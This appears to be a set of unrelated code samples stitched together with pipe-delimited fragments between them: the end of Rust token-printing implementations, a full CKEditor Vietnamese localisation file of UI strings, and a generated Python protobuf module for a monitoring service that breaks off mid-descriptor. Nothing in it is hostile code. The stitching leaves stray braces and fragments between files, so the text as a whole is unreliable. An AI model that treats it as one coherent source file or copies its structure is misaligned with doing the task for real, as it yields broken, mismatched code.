use super::*;
use proc_macro2::TokenStream;
use quote::ToTokens;
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for Attribute {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.pound_token.to_tokens(tokens);
if let AttrStyle::Inner(b) = &self.style {
b.to_tokens(tokens);
}
self.bracket_token.surround(tokens, |tokens| {
self.path.to_tokens(tokens);
self.tokens.to_tokens(tokens);
});
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for MetaList {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.path.to_tokens(tokens);
self.paren_token.surround(tokens, |tokens| {
self.nested.to_tokens(tokens);
})
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "printing")))]
impl ToTokens for MetaNameValue {
fn to_tokens(&self, tokens: &mut TokenStream) {
self.path.to_tokens(tokens);
self.eq_token.to_tokens(tokens);
self.lit.to_tokens(tokens);
}
}
}
| parse_meta_after_path |
vi.js | /*
Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
/**
* @fileOverview Defines the {@link CKEDITOR.lang} object, for the
* Vietnamese language.
*/
/**#@+
@type String
@example
*/
/**
* Contains the dictionary of language entries.
* @namespace
*/
CKEDITOR.lang['vi'] =
{
/**
* The language reading direction. Possible values are "rtl" for
* Right-To-Left languages (like Arabic) and "ltr" for Left-To-Right
* languages (like English).
* @default 'ltr'
*/
dir : 'ltr',
/*
* Screenreader titles. Please note that screenreaders are not always capable
* of reading non-English words. So be careful while translating it.
*/
editorTitle : 'Trình soạn thảo văn bản có định dạng, %1',
editorHelp : 'Nhấn ALT + 0 để được giúp đỡ',
// ARIA descriptions.
toolbars : 'Thanh công cụ',
editor : 'Bộ soạn thảo',
// Toolbar buttons without dialogs.
source : 'Mã HTML',
newPage : 'Trang mới',
save : 'Lưu',
preview : 'Xem trước',
cut : 'Cắt',
copy : 'Sao chép',
paste : 'Dán',
print : 'In',
underline : 'Gạch chân',
bold : 'Đậm',
italic : 'Nghiêng',
selectAll : 'Chọn tất cả',
removeFormat : 'Xoá định dạng',
strike : 'Gạch xuyên ngang',
subscript : 'Chỉ số dưới',
superscript : 'Chỉ số trên',
horizontalrule : 'Chèn đường phân cách ngang',
pagebreak : 'Chèn ngắt trang',
pagebreakAlt : 'Ngắt trang',
unlink : 'Xoá liên kết',
undo : 'Khôi phục thao tác',
redo : 'Làm lại thao tác',
// Common messages and labels.
common :
{
browseServer : 'Duyệt trên máy chủ',
url : 'URL',
protocol : 'Giao thức',
upload : 'Tải lên',
uploadSubmit : 'Tải lên máy chủ',
image : 'Hình ảnh',
flash : 'Flash',
form : 'Biểu mẫu',
checkbox : 'Nút kiểm',
radio : 'Nút chọn',
textField : 'Trường văn bản',
textarea : 'Vùng văn bản',
hiddenField : 'Trường ẩn',
button : 'Nút',
select : 'Ô chọn',
imageButton : 'Nút hình ảnh',
notSet : '<không thiết lập>',
id : 'Định danh',
name : 'Tên',
langDir : 'Hướng ngôn ngữ',
langDirLtr : 'Trái sang phải (LTR)',
langDirRtl : 'Phải sang trái (RTL)',
langCode : 'Mã ngôn ngữ',
longDescr : 'Mô tả URL',
cssClass : 'Lớp Stylesheet',
advisoryTitle : 'Nhan đề hướng dẫn',
cssStyle : 'Kiểu (style)',
ok : 'Đồng ý',
cancel : 'Bỏ qua',
close : 'Đóng',
preview : 'Xem trước',
generalTab : 'Tab chung',
advancedTab : 'Tab mở rộng',
validateNumberFailed : 'Giá trị này không phải là số.',
confirmNewPage : 'Mọi thay đổi không được lưu lại, nội dung này sẽ bị mất. Bạn có chắc chắn muốn tải một trang mới?',
confirmCancel : 'Một vài tùy chọn đã bị thay đổi. Bạn có chắc chắn muốn đóng hộp thoại?',
options : 'Tùy chọn',
target : 'Đích đến',
targetNew : 'Cửa sổ mới (_blank)',
targetTop : 'Cửa sổ trên cùng (_top)',
targetSelf : 'Tại trang (_self)',
targetParent : 'Cửa sổ cha (_parent)',
langDirLTR : 'Trái sang phải (LTR)',
langDirRTL : 'Phải sang trái (RTL)',
styles : 'Kiểu',
cssClasses : 'Lớp CSS',
width : 'Chiều rộng',
height : 'Chiều cao',
align : 'Vị trí',
alignLeft : 'Trái',
alignRight : 'Phải',
alignCenter : 'Giữa',
alignTop : 'Trên',
alignMiddle : 'Giữa',
alignBottom : 'Dưới',
invalidHeight : 'Chiều cao phải là số nguyên.',
invalidWidth : 'Chiều rộng phải là số nguyên.',
invalidCssLength : 'Giá trị quy định cho trường "%1" phải là một số dương có hoặc không có một đơn vị đo CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).',
invalidHtmlLength : 'Giá trị quy định cho trường "%1" phải là một số dương có hoặc không có một đơn vị đo HTML hợp lệ (px hoặc %).',
invalidInlineStyle : 'Giá trị quy định cho kiểu nội tuyến phải bao gồm một hoặc nhiều dữ liệu với định dạng "tên:giá trị", cách nhau bằng dấu chấm phẩy.',
cssLengthTooltip : 'Nhập một giá trị theo pixel hoặc một số với một đơn vị CSS hợp lệ (px, %, in, cm, mm, em, ex, pt, hoặc pc).',
// Put the voice-only part of the label in the span.
unavailable : '%1<span class="cke_accessibility">, không có</span>'
},
contextmenu :
{
options : 'Tùy chọn menu bổ sung'
},
// Special char dialog.
specialChar :
{
toolbar : 'Chèn ký tự đặc biệt',
title : 'Hãy chọn ký tự đặc biệt',
options : 'Tùy chọn các ký tự đặc biệt'
},
// Link dialog.
link :
{
toolbar : 'Chèn/Sửa liên kết',
other : '<khác>',
menu : 'Sửa liên kết',
title : 'Liên kết',
info : 'Thông tin liên kết',
target : 'Đích',
upload : 'Tải lên',
advanced : 'Mở rộng',
type : 'Kiểu liên kết',
toUrl : 'URL',
toAnchor : 'Neo trong trang này',
toEmail : 'Thư điện tử',
targetFrame : '<khung>',
targetPopup : '<cửa sổ popup>',
targetFrameName : 'Tên khung đích',
targetPopupName : 'Tên cửa sổ Popup',
popupFeatures : 'Đặc điểm của cửa sổ Popup',
popupResizable : 'Có thể thay đổi kích cỡ',
popupStatusBar : 'Thanh trạng thái',
popupLocationBar: 'Thanh vị trí',
popupToolbar : 'Thanh công cụ',
popupMenuBar : 'Thanh Menu',
popupFullScreen : 'Toàn màn hình (IE)',
popupScrollBars : 'Thanh cuộn',
popupDependent : 'Phụ thuộc (Netscape)',
popupLeft : 'Vị trí bên trái',
popupTop : 'Vị trí phía trên',
id : 'Định danh',
langDir : 'Hướng ngôn ngữ',
langDirLTR : 'Trái sang phải (LTR)',
langDirRTL : 'Phải sang trái (RTL)',
acccessKey : 'Phím hỗ trợ truy cập',
name : 'Tên',
langCode : 'Mã ngôn ngữ',
tabIndex : 'Chỉ số của Tab',
advisoryTitle : 'Nhan đề hướng dẫn',
advisoryContentType : 'Nội dung hướng dẫn',
cssClasses : 'Lớp Stylesheet',
charset : 'Bảng mã của tài nguyên được liên kết đến',
styles : 'Kiểu (style)',
rel : 'Quan hệ',
selectAnchor : 'Chọn một điểm neo',
anchorName : 'Theo tên điểm neo',
anchorId : 'Theo định danh thành phần',
emailAddress : 'Thư điện tử',
emailSubject : 'Tiêu đề thông điệp',
emailBody : 'Nội dung thông điệp',
noAnchors : '(Không có điểm neo nào trong tài liệu)',
noUrl : 'Hãy đưa vào đường dẫn liên kết (URL)',
noEmail : 'Hãy đưa vào địa chỉ thư điện tử'
},
// Anchor dialog
anchor :
{
toolbar : 'Chèn/Sửa điểm neo',
menu : 'Thuộc tính điểm neo',
title : 'Thuộc tính điểm neo',
name : 'Tên của điểm neo',
errorName : 'Hãy nhập vào tên của điểm neo',
remove : 'Xóa neo'
},
// List style dialog
list:
{
numberedTitle : 'Thuộc tính danh sách có thứ tự',
bulletedTitle : 'Thuộc tính danh sách không thứ tự',
type : 'Kiểu loại',
start : 'Bắt đầu',
validateStartNumber :'Số bắt đầu danh sách phải là một số nguyên.',
circle : 'Khuyên tròn',
disc : 'Hình đĩa',
square : 'Hình vuông',
none : 'Không gì cả',
notset : '<không thiết lập>',
armenian : 'Số theo kiểu Armenian',
georgian : 'Số theo kiểu Georgian (an, ban, gan...)',
lowerRoman : 'Số La Mã kiểu thường (i, ii, iii, iv, v...)',
upperRoman : 'Số La Mã kiểu HOA (I, II, III, IV, V...)',
lowerAlpha : 'Kiểu abc thường (a, b, c, d, e...)',
upperAlpha : 'Kiểu ABC HOA (A, B, C, D, E...)',
lowerGreek : 'Kiểu Hy Lạp (alpha, beta, gamma...)',
decimal : 'Kiểu số (1, 2, 3 ...)',
decimalLeadingZero : 'Kiểu số (01, 02, 03...)'
},
// Find And Replace Dialog
findAndReplace :
{
title : 'Tìm kiếm và thay thế',
find : 'Tìm kiếm',
replace : 'Thay thế',
findWhat : 'Tìm chuỗi:',
replaceWith : 'Thay bằng:',
notFoundMsg : 'Không tìm thấy chuỗi cần tìm.',
findOptions : 'Tùy chọn tìm kiếm',
matchCase : 'Phân biệt chữ hoa/thường',
matchWord : 'Giống toàn bộ từ',
matchCyclic : 'Giống một phần',
replaceAll : 'Thay thế tất cả',
replaceSuccessMsg : '%1 vị trí đã được thay thế.'
},
// Table Dialog
table :
{
toolbar : 'Bảng',
title : 'Thuộc tính bảng',
menu : 'Thuộc tính bảng',
deleteTable : 'Xóa bảng',
rows : 'Số hàng',
columns : 'Số cột',
border : 'Kích thước đường viền',
widthPx : 'Điểm ảnh (px)',
widthPc : 'Phần trăm (%)',
widthUnit : 'Đơn vị',
cellSpace : 'Khoảng cách giữa các ô',
cellPad : 'Khoảng đệm giữa ô và nội dung',
caption : 'Đầu đề',
summary : 'Tóm lược',
headers : 'Đầu đề',
headersNone : 'Không có',
headersColumn : 'Cột đầu tiên',
headersRow : 'Hàng đầu tiên',
headersBoth : 'Cả hai',
invalidRows : 'Số lượng hàng phải là một số lớn hơn 0.',
invalidCols : 'Số lượng cột phải là một số lớn hơn 0.',
invalidBorder : 'Kích cỡ của đường biên phải là một số nguyên.',
invalidWidth : 'Chiều rộng của bảng phải là một số nguyên.',
invalidHeight : 'Chiều cao của bảng phải là một số nguyên.',
invalidCellSpacing : 'Khoảng cách giữa các ô phải là một số nguyên.',
invalidCellPadding : 'Khoảng đệm giữa ô và nội dung phải là một số nguyên.',
cell :
{
menu : 'Ô',
insertBefore : 'Chèn ô Phía trước',
insertAfter : 'Chèn ô Phía sau',
deleteCell : 'Xoá ô',
merge : 'Kết hợp ô',
mergeRight : 'Kết hợp sang phải',
mergeDown : 'Kết hợp xuống dưới',
splitHorizontal : 'Phân tách ô theo chiều ngang',
splitVertical : 'Phân tách ô theo chiều dọc',
title : 'Thuộc tính của ô',
cellType : 'Kiểu của ô',
rowSpan : 'Kết hợp hàng',
colSpan : 'Kết hợp cột',
wordWrap : 'Chữ liền hàng',
hAlign : 'Canh lề ngang',
vAlign : 'Canh lề dọc',
alignBaseline : 'Đường cơ sở',
bgColor : 'Màu nền',
borderColor : 'Màu viền',
data : 'Dữ liệu',
header : 'Đầu đề',
yes : 'Có',
no : 'Không',
invalidWidth : 'Chiều rộng của ô phải là một số nguyên.',
invalidHeight : 'Chiều cao của ô phải là một số nguyên.',
invalidRowSpan : 'Số hàng kết hợp phải là một số nguyên.',
invalidColSpan : 'Số cột kết hợp phải là một số nguyên.',
chooseColor : 'Chọn màu'
},
row :
{
menu : 'Hàng',
insertBefore : 'Chèn hàng phía trước',
insertAfter : 'Chèn hàng phía sau',
deleteRow : 'Xoá hàng'
},
column :
{
menu : 'Cột',
insertBefore : 'Chèn cột phía trước',
insertAfter : 'Chèn cột phía sau',
deleteColumn : 'Xoá cột'
}
},
// Button Dialog.
button :
{
title : 'Thuộc tính của nút',
text : 'Chuỗi hiển thị (giá trị)',
type : 'Kiểu',
typeBtn : 'Nút bấm',
typeSbm : 'Nút gửi',
typeRst : 'Nút nhập lại'
},
// Checkbox and Radio Button Dialogs.
checkboxAndRadio :
{
checkboxTitle : 'Thuộc tính nút kiểm',
radioTitle : 'Thuộc tính nút chọn',
value : 'Giá trị',
selected : 'Được chọn'
},
// Form Dialog.
form :
{
title : 'Thuộc tính biểu mẫu',
menu : 'Thuộc tính biểu mẫu',
action : 'Hành động',
method : 'Phương thức',
encoding : 'Bảng mã'
},
// Select Field Dialog.
select :
{
title : 'Thuộc tính ô chọn',
selectInfo : 'Thông tin',
opAvail : 'Các tùy chọn có thể sử dụng',
value : 'Giá trị',
size : 'Kích cỡ',
lines : 'dòng',
chkMulti : 'Cho phép chọn nhiều',
opText : 'Văn bản',
opValue : 'Giá trị',
btnAdd : 'Thêm',
btnModify : 'Thay đổi',
btnUp : 'Lên',
btnDown : 'Xuống',
btnSetValue : 'Giá trị được chọn',
btnDelete : 'Nút xoá'
},
// Textarea Dialog.
textarea :
{
title : 'Thuộc tính vùng văn bản',
cols : 'Số cột',
rows : 'Số hàng'
},
// Text Field Dialog.
textfield :
{
title : 'Thuộc tính trường văn bản',
name : 'Tên',
value : 'Giá trị',
charWidth : 'Độ rộng của ký tự',
maxChars : 'Số ký tự tối đa',
type : 'Kiểu',
typeText : 'Ký tự',
typePass : 'Mật khẩu'
},
// Hidden Field Dialog.
hidden :
{
title : 'Thuộc tính trường ẩn',
name : 'Tên',
value : 'Giá trị'
},
// Image Dialog.
image :
{
title : 'Thuộc tính của ảnh',
titleButton : 'Thuộc tính nút của ảnh',
menu : 'Thuộc tính của ảnh',
infoTab : 'Thông tin của ảnh',
btnUpload : 'Tải lên máy chủ',
upload : 'Tải lên',
alt : 'Chú thích ảnh',
lockRatio : 'Giữ nguyên tỷ lệ',
resetSize : 'Kích thước gốc',
border : 'Đường viền',
hSpace : 'Khoảng đệm ngang',
vSpace : 'Khoảng đệm dọc',
alertUrl : 'Hãy đưa vào đường dẫn của ảnh',
linkTab : 'Tab liên kết',
button2Img : 'Bạn có muốn chuyển nút bấm bằng ảnh được chọn thành ảnh?',
img2Button : 'Bạn có muốn chuyển đổi ảnh được chọn thành nút bấm bằng ảnh?',
urlMissing : 'Thiếu đường dẫn hình ảnh',
validateBorder : 'Chiều rộng của đường viền phải là một số nguyên dương',
validateHSpace : 'Khoảng đệm ngang phải là một số nguyên dương',
validateVSpace : 'Khoảng đệm dọc phải là một số nguyên dương'
},
// Flash Dialog
flash :
{
properties : 'Thuộc tính Flash',
propertiesTab : 'Thuộc tính',
title : 'Thuộc tính Flash',
chkPlay : 'Tự động chạy',
chkLoop : 'Lặp',
chkMenu : 'Cho phép bật menu của Flash',
chkFull : 'Cho phép toàn màn hình',
scale : 'Tỷ lệ',
scaleAll : 'Hiển thị tất cả',
scaleNoBorder : 'Không đường viền',
scaleFit : 'Vừa vặn',
access : 'Truy cập mã',
accessAlways : 'Luôn luôn',
accessSameDomain: 'Cùng tên miền',
accessNever : 'Không bao giờ',
alignAbsBottom : 'Dưới tuyệt đối',
alignAbsMiddle : 'Giữa tuyệt đối',
alignBaseline : 'Đường cơ sở',
alignTextTop : 'Phía trên chữ',
quality : 'Chất lượng',
qualityBest : 'Tốt nhất',
qualityHigh : 'Cao',
qualityAutoHigh : 'Cao tự động',
qualityMedium : 'Trung bình',
qualityAutoLow : 'Thấp tự động',
qualityLow : 'Thấp',
windowModeWindow: 'Cửa sổ',
windowModeOpaque: 'Mờ đục',
windowModeTransparent : 'Trong suốt',
windowMode : 'Chế độ cửa sổ',
flashvars : 'Các biến số dành cho Flash',
bgcolor : 'Màu nền',
hSpace : 'Khoảng đệm ngang',
vSpace : 'Khoảng đệm dọc',
validateSrc : 'Hãy đưa vào đường dẫn liên kết',
validateHSpace : 'Khoảng đệm ngang phải là số nguyên.',
validateVSpace : 'Khoảng đệm dọc phải là số nguyên.'
},
// Speller Pages Dialog
spellCheck :
{
toolbar : 'Kiểm tra chính tả',
title : 'Kiểm tra chính tả',
notAvailable : 'Xin lỗi, dịch vụ này hiện tại không có.',
errorLoading : 'Lỗi khi đang nạp dịch vụ ứng dụng: %s.',
notInDic : 'Không có trong từ điển',
changeTo : 'Chuyển thành',
btnIgnore : 'Bỏ qua',
btnIgnoreAll : 'Bỏ qua tất cả',
btnReplace : 'Thay thế',
btnReplaceAll : 'Thay thế tất cả',
btnUndo : 'Phục hồi lại',
noSuggestions : '- Không đưa ra gợi ý về từ -',
progress : 'Đang tiến hành kiểm tra chính tả...',
noMispell : 'Hoàn tất kiểm tra chính tả: Không có lỗi chính tả',
noChanges : 'Hoàn tất kiểm tra chính tả: Không có từ nào được thay đổi',
oneChange : 'Hoàn tất kiểm tra chính tả: Một từ đã được thay đổi',
manyChanges : 'Hoàn tất kiểm tra chính tả: %1 từ đã được thay đổi',
ieSpellDownload : 'Chức năng kiểm tra chính tả chưa được cài đặt. Bạn có muốn tải về ngay bây giờ?'
},
smiley :
{
toolbar : 'Hình biểu lộ cảm xúc (mặt cười)',
title : 'Chèn hình biểu lộ cảm xúc (mặt cười)',
options : 'Tùy chọn hình biểu lộ cảm xúc'
},
elementsPath :
{
eleLabel : 'Nhãn thành phần',
eleTitle : '%1 thành phần'
},
numberedlist : 'Chèn/Xoá Danh sách có thứ tự',
bulletedlist : 'Chèn/Xoá Danh sách không thứ tự',
indent : 'Dịch vào trong',
outdent : 'Dịch ra ngoài',
justify :
{
left : 'Canh trái',
center : 'Canh giữa',
right : 'Canh phải',
block : 'Canh đều'
},
blockquote : 'Khối trích dẫn',
clipboard :
{
title : 'Dán',
cutError : 'Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh cắt. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+X).',
copyError : 'Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh sao chép. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+C).',
pasteMsg : 'Hãy dán nội dung vào trong khung bên dưới, sử dụng tổ hợp phím (<STRONG>Ctrl/Cmd+V</STRONG>) và nhấn vào nút <STRONG>Đồng ý</STRONG>.',
securityMsg : 'Do thiết lập bảo mật của trình duyệt nên trình biên tập không thể truy cập trực tiếp vào nội dung đã sao chép. Bạn cần phải dán lại nội dung vào cửa sổ này.',
pasteArea : 'Khu vực dán'
},
pastefromword :
{
confirmCleanup : 'Văn bản bạn muốn dán có kèm định dạng của Word. Bạn có muốn loại bỏ định dạng Word trước khi dán?',
toolbar : 'Dán với định dạng Word',
title : 'Dán với định dạng Word',
error : 'Không thể làm sạch dữ liệu dán do một lỗi nội bộ'
| pasteText :
{
button : 'Dán theo định dạng văn bản thuần',
title : 'Dán theo định dạng văn bản thuần'
},
templates :
{
button : 'Mẫu dựng sẵn',
title : 'Nội dung Mẫu dựng sẵn',
options : 'Tùy chọn mẫu dựng sẵn',
insertOption : 'Thay thế nội dung hiện tại',
selectPromptMsg : 'Hãy chọn mẫu dựng sẵn để mở trong trình biên tập<br>(nội dung hiện tại sẽ bị mất):',
emptyListMsg : '(Không có mẫu dựng sẵn nào được định nghĩa)'
},
showBlocks : 'Hiển thị các khối',
stylesCombo :
{
label : 'Kiểu',
panelTitle : 'Phong cách định dạng',
panelTitle1 : 'Kiểu khối',
panelTitle2 : 'Kiểu trực tiếp',
panelTitle3 : 'Kiểu đối tượng'
},
format :
{
label : 'Định dạng',
panelTitle : 'Định dạng',
tag_p : 'Bình thường (P)',
tag_pre : 'Đã thiết lập',
tag_address : 'Address',
tag_h1 : 'Heading 1',
tag_h2 : 'Heading 2',
tag_h3 : 'Heading 3',
tag_h4 : 'Heading 4',
tag_h5 : 'Heading 5',
tag_h6 : 'Heading 6',
tag_div : 'Bình thường (DIV)'
},
div :
{
title : 'Tạo khối các thành phần',
toolbar : 'Tạo khối các thành phần',
cssClassInputLabel : 'Các lớp CSS',
styleSelectLabel : 'Kiểu (style)',
IdInputLabel : 'Định danh (id)',
languageCodeInputLabel : 'Mã ngôn ngữ',
inlineStyleInputLabel : 'Kiểu nội dòng',
advisoryTitleInputLabel : 'Nhan đề hướng dẫn',
langDirLabel : 'Hướng ngôn ngữ',
langDirLTRLabel : 'Trái sang phải (LTR)',
langDirRTLLabel : 'Phải qua trái (RTL)',
edit : 'Chỉnh sửa',
remove : 'Xóa bỏ'
},
iframe :
{
title : 'Thuộc tính iframe',
toolbar : 'Iframe',
noUrl : 'Vui lòng nhập địa chỉ iframe',
scrolling : 'Kích hoạt thanh cuộn',
border : 'Hiển thị viền khung'
},
font :
{
label : 'Phông',
voiceLabel : 'Phông',
panelTitle : 'Phông'
},
fontSize :
{
label : 'Cỡ chữ',
voiceLabel : 'Kích cỡ phông',
panelTitle : 'Cỡ chữ'
},
colorButton :
{
textColorTitle : 'Màu chữ',
bgColorTitle : 'Màu nền',
panelTitle : 'Màu sắc',
auto : 'Tự động',
more : 'Màu khác...'
},
colors :
{
'000' : 'Đen',
'800000' : 'Maroon',
'8B4513' : 'Saddle Brown',
'2F4F4F' : 'Dark Slate Gray',
'008080' : 'Teal',
'000080' : 'Navy',
'4B0082' : 'Indigo',
'696969' : 'Dark Gray',
'B22222' : 'Fire Brick',
'A52A2A' : 'Nâu',
'DAA520' : 'Golden Rod',
'006400' : 'Dark Green',
'40E0D0' : 'Turquoise',
'0000CD' : 'Medium Blue',
'800080' : 'Purple',
'808080' : 'Xám',
'F00' : 'Đỏ',
'FF8C00' : 'Dark Orange',
'FFD700' : 'Vàng',
'008000' : 'Xanh lá cây',
'0FF' : 'Cyan',
'00F' : 'Xanh da trời',
'EE82EE' : 'Tím',
'A9A9A9' : 'Xám tối',
'FFA07A' : 'Light Salmon',
'FFA500' : 'Màu cam',
'FFFF00' : 'Vàng',
'00FF00' : 'Lime',
'AFEEEE' : 'Pale Turquoise',
'ADD8E6' : 'Light Blue',
'DDA0DD' : 'Plum',
'D3D3D3' : 'Light Grey',
'FFF0F5' : 'Lavender Blush',
'FAEBD7' : 'Antique White',
'FFFFE0' : 'Light Yellow',
'F0FFF0' : 'Honeydew',
'F0FFFF' : 'Azure',
'F0F8FF' : 'Alice Blue',
'E6E6FA' : 'Lavender',
'FFF' : 'Trắng'
},
scayt :
{
title : 'Kiểm tra chính tả ngay khi gõ chữ (SCAYT)',
opera_title : 'Không hỗ trợ trên trình duyệt Opera',
enable : 'Bật SCAYT',
disable : 'Tắt SCAYT',
about : 'Thông tin về SCAYT',
toggle : 'Bật tắt SCAYT',
options : 'Tùy chọn',
langs : 'Ngôn ngữ',
moreSuggestions : 'Đề xuất thêm',
ignore : 'Bỏ qua',
ignoreAll : 'Bỏ qua tất cả',
addWord : 'Thêm từ',
emptyDic : 'Tên của từ điển không được để trống.',
optionsTab : 'Tùy chọn',
allCaps : 'Không phân biệt chữ HOA chữ thường',
ignoreDomainNames : 'Bỏ qua tên miền',
mixedCase : 'Không phân biệt loại chữ',
mixedWithDigits : 'Không phân biệt chữ và số',
languagesTab : 'Tab ngôn ngữ',
dictionariesTab : 'Từ điển',
dic_field_name : 'Tên từ điển',
dic_create : 'Tạo',
dic_restore : 'Phục hồi',
dic_delete : 'Xóa',
dic_rename : 'Thay tên',
dic_info : 'Ban đầu, từ điển người dùng được lưu trữ trong một cookie. Tuy nhiên, kích thước cookie bị giới hạn. Khi từ điển của người dùng phát triển đến mức không thể lưu trữ trong cookie nữa, từ điển sẽ được lưu trữ trên máy chủ của chúng tôi. Để lưu trữ từ điển cá nhân của bạn trên máy chủ của chúng tôi, bạn nên đặt một tên cho từ điển của mình. Nếu bạn đã có một từ điển được lưu trữ, xin vui lòng gõ tên của nó và nhấn vào nút Phục hồi.',
aboutTab : 'Thông tin'
},
about :
{
title : 'Thông tin về CKEditor',
dlgTitle : 'Thông tin về CKEditor',
help : 'Kiểm tra $1 để được giúp đỡ.',
userGuide : 'Hướng dẫn sử dụng CKEditor',
moreInfo : 'Vui lòng ghé thăm trang web của chúng tôi để có thông tin về giấy phép:',
copy : 'Bản quyền © $1. Giữ toàn quyền.'
},
maximize : 'Phóng to tối đa',
minimize : 'Thu nhỏ',
fakeobjects :
{
anchor : 'Điểm neo',
flash : 'Flash',
iframe : 'IFrame',
hiddenfield : 'Trường ẩn',
unknown : 'Đối tượng không xác định'
},
resize : 'Kéo rê để thay đổi kích cỡ',
colordialog :
{
title : 'Chọn màu',
options : 'Tùy chọn màu',
highlight : 'Màu chọn',
selected : 'Màu đã chọn',
clear : 'Xóa bỏ'
},
toolbarCollapse : 'Thu gọn thanh công cụ',
toolbarExpand : 'Mở rộng thanh công cụ',
toolbarGroups :
{
document : 'Tài liệu',
clipboard : 'Clipboard/Undo',
editing : 'Chỉnh sửa',
forms : 'Biểu mẫu',
basicstyles : 'Kiểu cơ bản',
paragraph : 'Đoạn',
links : 'Liên kết',
insert : 'Chèn',
styles : 'Kiểu',
colors : 'Màu sắc',
tools : 'Công cụ'
},
bidi :
{
ltr : 'Văn bản hướng từ trái sang phải',
rtl : 'Văn bản hướng từ phải sang trái'
},
docprops :
{
label : 'Thuộc tính Tài liệu',
title : 'Thuộc tính Tài liệu',
design : 'Thiết kế',
meta : 'Siêu dữ liệu',
chooseColor : 'Chọn màu',
other : '<khác>',
docTitle : 'Tiêu đề Trang',
charset : 'Bảng mã ký tự',
charsetOther : 'Bảng mã ký tự khác',
charsetASCII : 'ASCII',
charsetCE : 'Trung Âu',
charsetCT : 'Tiếng Trung Quốc (Big5)',
charsetCR : 'Tiếng Kirin',
charsetGR : 'Tiếng Hy Lạp',
charsetJP : 'Tiếng Nhật',
charsetKR : 'Tiếng Hàn',
charsetTR : 'Tiếng Thổ Nhĩ Kỳ',
charsetUN : 'Unicode (UTF-8)',
charsetWE : 'Tây Âu',
docType : 'Kiểu Đề mục Tài liệu',
docTypeOther : 'Kiểu Đề mục Tài liệu khác',
xhtmlDec : 'Bao gồm cả định nghĩa XHTML',
bgColor : 'Màu nền',
bgImage : 'URL của Hình ảnh nền',
bgFixed : 'Không cuộn nền',
txtColor : 'Màu chữ',
margin : 'Đường biên của Trang',
marginTop : 'Trên',
marginLeft : 'Trái',
marginRight : 'Phải',
marginBottom : 'Dưới',
metaKeywords : 'Các từ khóa chỉ mục tài liệu (phân cách bởi dấu phẩy)',
metaDescription : 'Mô tả tài liệu',
metaAuthor : 'Tác giả',
metaCopyright : 'Bản quyền',
previewHtml : '<p>Đây là một số <strong>văn bản mẫu</strong>. Bạn đang sử dụng <a href="javascript:void(0)">CKEditor</a>.</p>'
}
}; | },
|
DataMonitoringService_pb2.py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: monitoring/DataMonitoringService.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from ..uac import Collaborator_pb2 as uac_dot_Collaborator__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='monitoring/DataMonitoringService.proto',
package='ai.verta.monitoring',
syntax='proto3',
serialized_options=b'P\001ZAgithub.com/VertaAI/modeldb/protos/gen/go/protos/public/monitoring',
serialized_pb=b'\n&monitoring/DataMonitoringService.proto\x12\x13\x61i.verta.monitoring\x1a\x16uac/Collaborator.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x1cgoogle/protobuf/struct.proto\"@\n\x08Profiler\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x03 \x01(\t\"~\n\x15\x43reateProfilerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x02 \x01(\t\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"]\n\x12GetProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"\x8a\x01\n\x15UpdateProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x03 \x01(\t\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"T\n\x14ListProfilersRequest\x1a<\n\x08Response\x12\x30\n\tprofilers\x18\x01 \x03(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"/\n\x15\x44\x65leteProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a\n\n\x08Response\"d\n\x0f\x42uildStatusEnum\"Q\n\x0b\x42uildStatus\x12\r\n\tUNDEFINED\x10\x00\x12\x0c\n\x08\x42UILDING\x10\x01\x12\x0c\n\x08\x44\x45LETING\x10\x02\x12\t\n\x05\x45RROR\x10\x03\x12\x0c\n\x08\x46INISHED\x10\x04\"r\n\x10\x44\x65ployStatusEnum\"^\n\x0c\x44\x65ployStatus\x12\r\n\tUNDEFINED\x10\x00\x12\x0c\n\x08INACTIVE\x10\x01\x12\n\n\x06\x41\x43TIVE\x10\x02\x12\x0c\n\x08UPDATING\x10\x03\x12\x0c\n\x08\x43REATING\x10\x04\x12\t\n\x05\x45RROR\x10\x05\"\xd5\x01\n\x0eProfilerStatus\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x12\x46\n\x0c\x62uild_status\x18\x03 \x01(\x0e\x32\x30.ai.verta.monitoring.BuildStatusEnum.BuildStatus\x12I\n\rdeploy_status\x18\x04 